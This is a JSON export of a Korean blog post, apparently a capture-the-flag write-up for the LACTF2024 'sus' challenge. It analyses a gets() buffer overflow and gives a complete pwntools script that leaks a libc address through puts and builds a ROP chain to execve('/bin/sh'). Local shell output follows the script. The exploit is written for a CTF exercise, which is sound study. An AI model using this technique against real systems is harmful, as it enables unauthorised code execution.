{"id":3355,"date":"2025-04-20T13:51:36","date_gmt":"2025-04-20T04:51:36","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3355"},"modified":"2025-04-20T13:52:28","modified_gmt":"2025-04-20T04:52:28","slug":"sus","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3355","title":{"rendered":"[LACTF2024] sus"},"content":{"rendered":"\n

checksec<\/h3>\n\n\n\n
[*] '\/home\/seo\/study\/LACTF2024\/sus\/sus'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      No canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No<\/pre>\n\n\n\n
Decompile src \/ Analysis<\/h3>\n\n\n\n
v4 \ubcc0\uc218\uc5d0 gets \ud568\uc218\ub85c \uc785\ub825\ubc1b\ub294\ub370, \ubc84\ud37c \uc81c\ud55c\uc774 \uc5c6\uc5b4 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd.<\/p>\n\n\n\n
rdi\ub294 gets \ud638\ucd9c \uc774\ud6c4 RBP-8\uc5d0 \uc758\ud574 \uac12\uc744 \ucee8\ud2b8\ub864\ub420 \uc218 \uc788\uc74c.<\/p>\n\n\n\n
.text:000000000040118B                 call    _gets\n.text:0000000000401190                 mov     rax, [rbp-8]\n.text:0000000000401194                 mov     rdi, rax<\/pre>\n\n\n\n
int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _BYTE v4[56]; \/\/ [rsp+0h] [rbp-40h] BYREF\n  __int64 v5; \/\/ [rsp+38h] [rbp-8h]\n\n  setbuf(_bss_start, 0);\n  v5 = 69;\n  puts(\"sus?\");\n  gets((__int64)v4);\n  sus(v5);\n  return 0;\n}<\/pre>\n\n\n\n
solve.py<\/h3>\n\n\n\n
RDI \ub808\uc9c0\uc2a4\ud130\uac12\uc744 puts\u2019s got\uc73c\ub85c \uc9c0\uc815\uc2dc\ucf1c libc \uc8fc\uc18c\uc5d0 \uc788\ub294 puts \uc8fc\uc18c\ub97c LEAK\ud568. 
\uc774\ud6c4, main\uc744 \ud55c\ubc88 \ub354 \ud638\ucd9c\uc2dc\ucf1c ROP\ub97c \ud1b5\ud574 \uc258 \ud68d\ub4dd.<\/p>\n\n\n\n
from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\n\nwarnings.filterwarnings('ignore')\n\np = process(\".\/sus\")\n\nsla = p.sendlineafter\nsa = p.sendafter\n\nputs_got = 0x404000\nputs_plt = 0x401030\nmain = 0x401151\n\npayload = b\"X\" * 0x38\npayload += p64(puts_got)   #set rdi\npayload += b\"B\"*8   #set rbp\npayload += p64(puts_plt)    #set ret\npayload += p64(main)\n\nsla(b\"sus?\\n\", payload)\n\nlibc_puts = p.recv(6).ljust(0x8, b\"\\x00\")\nlibc_puts = u64(libc_puts)\nsuccess(f\"libc_puts: {hex(libc_puts)}\")\nlibc_base = libc_puts - 0x80e50\nsuccess(f\"libc_base: {hex(libc_base)}\")\n\n\npop_rdi_ret = libc_base + 0x000000000002a3e5\npop_rsi_ret = libc_base + 0x000000000002be51\npop_rdx_pop_r11_ret = libc_base + 0x000000000011f2e7\nexecve = libc_base + 0x00000000000eb080\nbin_sh = libc_base + 0x1d8678\n\npayload = b\"X\" * 0x40   \npayload += b\"Y\" * 8     #set rbp \npayload += p64(pop_rdi_ret)      #set ret\npayload += p64(bin_sh)\npayload += p64(pop_rsi_ret)\npayload += p64(0)\npayload += p64(pop_rdx_pop_r11_ret)\npayload += p64(0)\npayload += p64(0)\npayload += p64(execve)\n\nsla(b\"sus?\\n\", payload)\n\np.interactive()<\/pre>\n\n\n\n
Result<\/h3>\n\n\n\n
seo@seo:~\/study\/LACTF2024\/sus$ python3 solve.py\n[+] Starting local process '.\/sus': pid 3306\n[+] libc_puts: 0x7ffff7c80e50\n[+] libc_base: 0x7ffff7c00000\n[*] Switching to interactive mode\n$ id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)\n$ whoami\nseo\n$ ls\nprob  solve.py  sus  sus.id0  sus.id1  sus.id2  sus.nam  sus.til\n$<\/pre>\n","protected":false},"excerpt":{"rendered":"
checksec Decompile src \/ Analysis v4 \ubcc0\uc218\uc5d0 gets \ud568\uc218\ub85c \uc785\ub825\ubc1b\ub294\ub370, \ubc84\ud37c \uc81c\ud55c\uc774 \uc5c6\uc5b4 BOF \ucde8\uc57d\uc810 \ubc1c\uc0dd. rdi\ub294 gets \ud638\ucd9c \uc774\ud6c4 RBP-8\uc5d0 \uc758\ud574 \uac12\uc744 \ucee8\ud2b8\ub864\ub420 \uc218 \uc788\uc74c. solve.py RDI \ub808\uc9c0\uc2a4\ud130\uac12\uc744 puts\u2019s got\uc73c\ub85c \uc9c0\uc815\uc2dc\ucf1c libc \uc8fc\uc18c\uc5d0 \uc788\ub294 puts \uc8fc\uc18c\ub97c LEAK\ud568. \uc774\ud6c4, main\uc744 \ud55c\ubc88 \ub354 \ud638\ucd9c\uc2dc\ucf1c ROP\ub97c \ud1b5\ud574 \uc258 \ud68d\ub4dd. Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,31],"class_list":["post-3355","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-rop"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3355"}],"version-history":[{"count":2,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3355\/revisions"}],"predecessor-version":[{"id":3358,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3355\/revisions\/3358"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}